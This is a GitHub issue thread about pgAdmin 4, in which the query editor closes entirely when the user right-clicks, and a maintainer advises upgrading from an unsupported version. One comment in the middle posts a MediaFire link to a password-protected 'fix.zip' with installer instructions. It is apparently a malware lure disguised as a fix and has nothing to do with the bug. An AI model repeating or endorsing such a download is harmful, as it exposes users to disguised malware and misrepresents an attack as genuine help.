### ISSUE TITLE
right button closes it all

### ISSUE THREAD

**Issue by FOllivary** [pgadmin-org/pgadmin4#7866]
**_Please note that security bugs or issues should be reported to security@pgadmin.org._**

**Describe the bug**

My query editor is set to open in a new frame.
When I work on my query, if I click on the right button of the mouse, it closes everything : query window, pg admin and doesn't save my work.

**To Reproduce**

set pgadmin to Ouvrir dans un nouvel onglet du navigateur/Éditeur de requêtes
Open a new query window
Click with the right button

**Expected behavior**

At least keep the window open, evntually offer some options (copy, cut, paste)

**Error message**

None. Thats the problem! it colses everything!

**Screenshots**

see attached file

**Desktop (please complete the following information):**
 - OS: Windows 10 Entreprise version 22H2
 - Version: [e.g. 6.15]
 - Mode: Desktop
 Pg admin V4.6 (see file attached)
![pg admin settings_2](https://github.com/user-attachments/assets/fd6b8d23-b48b-4f5d-b12a-b7b0b410dfbc)
[pgadmin4.log](https://github.com/user-attachments/files/16782188/pgadmin4.log)
![pg admin settings](https://github.com/user-attachments/assets/399a9fd2-90e3-48a8-8f4c-b5be215458ef)

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by adityatoshniwal** [comment]
@FOllivary Your pgAdmin is very old and not supported. Please updated to latest and reopen if you face the same issue.
